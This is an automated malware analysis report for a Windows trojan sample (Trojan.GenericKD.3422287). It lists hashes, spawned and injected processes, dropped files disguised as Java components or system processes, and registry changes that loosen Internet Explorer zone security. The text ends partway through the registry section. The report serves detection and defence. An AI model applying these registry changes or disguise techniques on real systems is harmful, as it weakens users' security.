Trojan.GenericKD.3422287_b2215f376d

by malwarelabrobot on August 4th, 2016 in Malware Descriptions.

Trojan.GenericKD.3422287 (BitDefender), Trojan:Java/Adwind.P (Microsoft), UDS:DangerousObject.Multi.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Nanocore.23 (DrWeb), Trojan.GenericKD.3422287 (B) (Emsisoft), GenericRXAC-DI!B2215F376D47 (McAfee), Trojan.Gen (Symantec), Trojan.MSIL.Injector (Ikarus), Trojan.GenericKD.3422287 (FSecure), MSIL10.ARGI (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R03EC0PGM16 (TrendMicro), Trojan.GenericKD.3422287 (AdAware), Trojan-PSW.Win32.Zbot.6.FD, Trojan.Win32.Swrort.3.FD, Sinowal.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Backdoor, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b2215f376d47ab7f6ff7c4f063c988f8
SHA1: 6df3ebc30b43b523ebf1108652d89f6c89c9d606
SHA256: 6a443f6e4a19b9d4ba9b9c90b5061a14792ac04f3671cf215324e37fcc4788a2
SSDeep: 24576:vTatLToIN1KmVx2X0cRjrNAGyxGx0HkCHe9yhmZi9d31ywEsyzWXJ/ :l41K3BaxGxkkCHeV6ywEsyT
Size: 1662128 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: Oracle Corporation
Created at: 2016-07-20 13:58:40
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

xcopy.exe:2188
cscript.exe:844
cscript.exe:2216
cscript.exe:2028
cscript.exe:2080
cscript.exe:3876
cscript.exe:2988
cscript.exe:2680
cscript.exe:2372
%original file name%.exe:1308
scvhost.exe:2464
scvhost.exe:3252
scvhost.exe:1208
scvhost.exe:1100
tasklist.exe:2880
loader.exe:1512
ibza.exe:976
hostname.exe:2756
ipconfig.exe:3116
soft.exe:604
soft.exe:284
fffffffffffffff.exe:3440
netsh.exe:3540

The Trojan injects its code into the following process(es):

cry.exe:372
scvhost.exe:3704
crys.exe:1460
crys.exe:3640
DW20.EXE:1296
DW20.EXE:2176
svchost.exe:2084
dwm.exe:440
Explorer.EXE:880

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process xcopy.exe:2188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Oracle\lib\rt.jar (336534 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\npjpi160_18.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\ssv.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\npdeploytk.dll (2321 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\audio\soundbank.gm (3073 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_de.properties (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\plugin.jar (11518 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\policytool.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\jvm.hprof.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\rmi.dll (5 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\instrument.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jpioji.dll (65 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\management-agent.jar (382 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\java.exe (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\npt.dll (8 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\pack200.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\j2pcsc.dll (7 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\rmid.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jqs.exe (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jpishare.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\sunmscapi.dll (16 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\javacpl.exe (59 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\msvcr71.dll (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_ja.properties (6 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jkernel.dll (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\psfont.properties.ja (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_zh_TW.rtf (29 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\hpi.dll (15 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\ssvagent.exe (30 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_ko.properties (5 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_sv.rtf (45 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\unpack200.exe (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\task.xml (1 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jpiexp.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jpinscp.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jsound.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages.properties (2 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\client\jvm.dll (18248 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\cmm.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\flavormap.properties (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\unpack.dll (61 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\msvcrt.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jbroker.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\javacpl.cpl (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\README.txt (16 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\management.dll (18 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\PYCC.pf (1425 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_it.rtf (25 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.98.bfc (2 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_fr.rtf (37 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\msvcr71.dll (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\fontmanager.dll (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\CIEXYZ.pf (51 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jdwp.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\java.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\tzmappings (7 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\tnameserv.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\classlist (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jaas_nt.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_es.rtf (26 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jpeg.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\orbd.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\task64.xml (1 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\unicows.dll (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\nio.dll (20 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\servertool.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\net.properties (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\ffjcext.zip (16 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\ktab.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\splashscreen.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\lzma.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_fr.properties (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\jsse.jar (3361 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\deploytk.dll (2321 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2native.dll (8 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\psfontj2d.properties (10 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\eula.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\COPYRIGHT (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\javaw.exe (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\java_crw_demo.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\rmiregistry.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\npoji610.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\deploy.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\awt.dll (7726 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\client\Xusage.txt (1 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\LINEAR_RGB.pf (1 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_de.rtf (39 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_ja.rtf (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\regutils.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_sv.properties (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jli.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\kinit.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\mlib_image.dll (4185 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jsoundds.dll (18 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\Welcome.html (994 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_es.properties (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\resources.jar (7547 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy.jar (22350 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE.rtf (13 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\j2pkcs11.dll (41 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\calendars.properties (1 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2ssv.dll (41 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.properties.src (9 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\sRGB.pf (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\npjp2.dll (65 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\hprof.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_zh_CN.rtf (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\dt_shmem.dll (16 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\ioser12.dll (12 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\sound.properties (1 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\java-rmi.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\jce.jar (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\GRAY.pf (632 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\client\classes.jsa (100416 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\THIRDPARTYLICENSEREADME.txt (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\javaws.exe (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\JdbcOdbc.dll (36 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\net.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jpicom.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\klist.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jqsnotify.exe (55 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\content-types.properties (5 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2launcher.exe (23 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\w2k_lsa_auth.dll (24 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2iexp.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\npdeploytk.dll (2321 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_ko.rtf (44 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.bfc (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_it.properties (3 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\dt_socket.dll (13 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\jawt.dll (5 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\wsdetect.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\zip.dll (47 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\javaws.jar (5873 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\axbridge.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\charsets.jar (49738 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\logging.properties (2 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\verify.dll (31 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\keytool.exe (33 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\LICENSE (12 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.98.properties.src (7 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\bin\dcpr.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Oracle\lib\meta-index (2 bytes)

The process %original file name%.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\cry.exe (162 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (571 bytes)
%Documents and Settings%\%current user%\Application Data\crys.exe (1744 bytes)
%Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Application Data\soft.exe (226 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
%Documents and Settings%\%current user%\Application Data\scvhost.exe (10815 bytes)
%Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (153 bytes)

The process cry.exe:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\crys.exe (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\New Order.jar (240 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\run.dat (8 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\catalog.dat (216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fffffffffffffff.exe (1645 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\storage.dat (1654 bytes)
%Documents and Settings%\All Users\Application Data\wipeshadow.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\loader.exe (77 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\settings.bin (24 bytes)

The process scvhost.exe:2464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpbe9c0882.bat (215 bytes)

The process scvhost.exe:3252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
%Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)
%Documents and Settings%\%current user%\Application Data\soft.exe (226 bytes)

The process scvhost.exe:1208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpa3c7d18a.bat (215 bytes)

The process scvhost.exe:1100 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
%Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)

The process loader.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\svchost.exe (113 bytes)

The process soft.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Imxyhi\ibza.exe (226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpbe9c0882.bat (209 bytes)

The process soft.exe:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp2edc71a6.bat (209 bytes)

Registry activity

The process xcopy.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E BC 4C C7 B1 42 3D EE 0E AC D3 6E 11 E5 11 CB"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process cscript.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 F2 30 22 FF 45 C9 48 EB 90 DD 36 F0 D9 57 41"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process cscript.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 6F 64 2D DD 51 85 71 7D 78 D2 35 2C 88 98 7C"

The process cscript.exe:2028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 8B 6A 2C 09 51 86 67 CE DD 81 51 9F 79 ED 3F"

The process cscript.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 7E 8C 98 C5 DC 35 45 26 48 37 73 11 F1 24 E5"

The process cscript.exe:3876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 DB B0 F7 79 FF 74 85 B0 E3 95 74 8C 43 14 C7"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process cscript.exe:2988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 8F A7 DD E4 5C DF 64 AC 7E DE 38 81 16 B7 23"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process cscript.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F F0 56 13 79 2D 18 5F C9 58 F1 03 F1 C0 20 47"

The process cscript.exe:2372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 43 AA 40 B8 AA AD AB 22 8A A0 F2 EE ED 84 03"

The process %original file name%.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 37 94 FA A2 9B 57 6B 88 ED 34 83 58 FC C6 2A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"Cry.exe" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"Pony.exe" = "Pony"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"soft.exe" = "soft"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Java\jre6\bin]
"javaw.exe" = "Java(TM) Platform SE binary"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"crys.exe" = "crys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"scvhost.exe" = "scvhost"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process cry.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 69 D8 9A A5 6C BB 8D EB 1E C0 76 4E 55 E9 A1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Loader.exe" = "NT Kernel & System"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"fffffffffffffff.exe" = "fffffffffffffff"
"crys.exe" = "crys"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process scvhost.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 8E BE 33 D4 48 E6 41 51 06 84 82 13 41 24 10"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process scvhost.exe:3252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 17 E0 74 86 EB 4D 6D AE 2F BA 69 1E 14 49 FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

